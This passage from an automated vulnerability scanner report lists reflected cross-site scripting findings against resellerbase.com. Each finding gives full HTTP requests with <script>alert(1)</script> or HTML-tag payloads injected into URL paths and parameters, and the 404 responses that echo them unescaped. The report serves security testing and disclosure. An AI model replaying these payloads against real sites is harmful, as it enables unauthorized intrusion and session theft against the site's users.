<p>The requested URL /detail/333f5c4<script>alert(1)</script>918a21030ec7a894a/rating.php?id=33&rating=5 was not found on this server.</p>
...[SNIP]...

2.2294. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 613b4<script>alert(1)</script>615fbe427a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33613b4<script>alert(1)</script>615fbe427a2/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33613b4<script>alert(1)</script>615fbe427a2/rating.php was not found on this server.</p>
...[SNIP]...

2.2295. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1225<script>alert(1)</script>959f1f43f994c7179 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/33/rating.phpe1225<script>alert(1)</script>959f1f43f994c7179?id=33&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/rating.phpe1225<script>alert(1)</script>959f1f43f994c7179?id=33&rating=5 was not found on this server.</p>
...[SNIP]...

2.2296. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload edf41<script>alert(1)</script>caecc2c4b03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/rating.phpedf41<script>alert(1)</script>caecc2c4b03 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/rating.phpedf41<script>alert(1)</script>caecc2c4b03 was not found on this server.</p>
...[SNIP]...

2.2297. http://www.resellerbase.com/detail/33/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a453e<script>alert(1)</script>2166841a0f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/rating.php?a453e<script>alert(1)</script>2166841a0f4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/rating.php?a453e<script>alert(1)</script>2166841a0f4=1 was not found on this server.</p>
...[SNIP]...

2.2298. http://www.resellerbase.com/detail/33/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85442<script>alert(1)</script>15ac8ffc51bea3403 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/33/rating.php/85442<script>alert(1)</script>15ac8ffc51bea3403?id=33&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/rating.php/85442<script>alert(1)</script>15ac8ffc51bea3403?id=33&rating=5 was not found on this server.</p>
...[SNIP]...

2.2299. http://www.resellerbase.com/detail/33/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5e37a<script>alert(1)</script>c4cc015f2fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5e37a<script>alert(1)</script>c4cc015f2fc/33/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5e37a<script>alert(1)</script>c4cc015f2fc/33/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2300. http://www.resellerbase.com/detail/33/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e678<script>alert(1)</script>7aaf067b74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/339e678<script>alert(1)</script>7aaf067b74e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/339e678<script>alert(1)</script>7aaf067b74e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2301. http://www.resellerbase.com/detail/33/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91ab7<script>alert(1)</script>62f127af741 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/search.php91ab7<script>alert(1)</script>62f127af741?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php91ab7<script>alert(1)</script>62f127af741?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2302. http://www.resellerbase.com/detail/33/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/33/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7d2bb<a>579816113a9 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/33/search.php?keyword=search...&Submit3=Search7d2bb<a>579816113a9&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php?keyword=search...&Submit3=Search7d2bb<a>579816113a9&opt=2 was not found on this server.</p>
...[SNIP]...

2.2303. http://www.resellerbase.com/detail/33/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/33/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5d6af<a>778d6dcac9e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/33/search.php?keyword=search...5d6af<a>778d6dcac9e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php?keyword=search...5d6af<a>778d6dcac9e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2304. http://www.resellerbase.com/detail/33/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dccaf<script>alert(1)</script>0e9bb3b8a93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/search.php?keyword=search...&Submit3=Search&opt=2&dccaf<script>alert(1)</script>0e9bb3b8a93=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php?keyword=search...&Submit3=Search&opt=2&dccaf<script>alert(1)</script>0e9bb3b8a93=1 was not found on this server.</p>
...[SNIP]...

2.2305. http://www.resellerbase.com/detail/33/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/33/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 983da<a>e250313b801 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/33/search.php?keyword=search...&Submit3=Search&opt=2983da<a>e250313b801 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/search.php?keyword=search...&Submit3=Search&opt=2983da<a>e250313b801 was not found on this server.</p>
...[SNIP]...

2.2306. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc8f7<script>alert(1)</script>922fe3f0686 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfc8f7<script>alert(1)</script>922fe3f0686/33/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfc8f7<script>alert(1)</script>922fe3f0686/33/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2307. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 44dee<script>alert(1)</script>7f6ef02cfb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3344dee<script>alert(1)</script>7f6ef02cfb3/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3344dee<script>alert(1)</script>7f6ef02cfb3/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2308. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b36ea<script>alert(1)</script>e9836bbb2b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themesb36ea<script>alert(1)</script>e9836bbb2b3/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themesb36ea<script>alert(1)</script>e9836bbb2b3/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2309. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e53b<script>alert(1)</script>b38759ea10d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos7e53b<script>alert(1)</script>b38759ea10d/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos7e53b<script>alert(1)</script>b38759ea10d/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2310. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 917f3<script>alert(1)</script>91f4ed5de0e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos/images917f3<script>alert(1)</script>91f4ed5de0e/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos/images917f3<script>alert(1)</script>91f4ed5de0e/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2311. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1aa8e<script>alert(1)</script>02d3c91d6fc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos/images/rating1aa8e<script>alert(1)</script>02d3c91d6fc/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/themes/kosmos/images/rating1aa8e<script>alert(1)</script>02d3c91d6fc/0.gif was not found on this server.</p>
...[SNIP]...

2.2312. http://www.resellerbase.com/detail/33/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c1640<script>alert(1)</script>8cc1c11f293 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/themes/kosmos/images/rating/0.gifc1640<script>alert(1)</script>8cc1c11f293 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

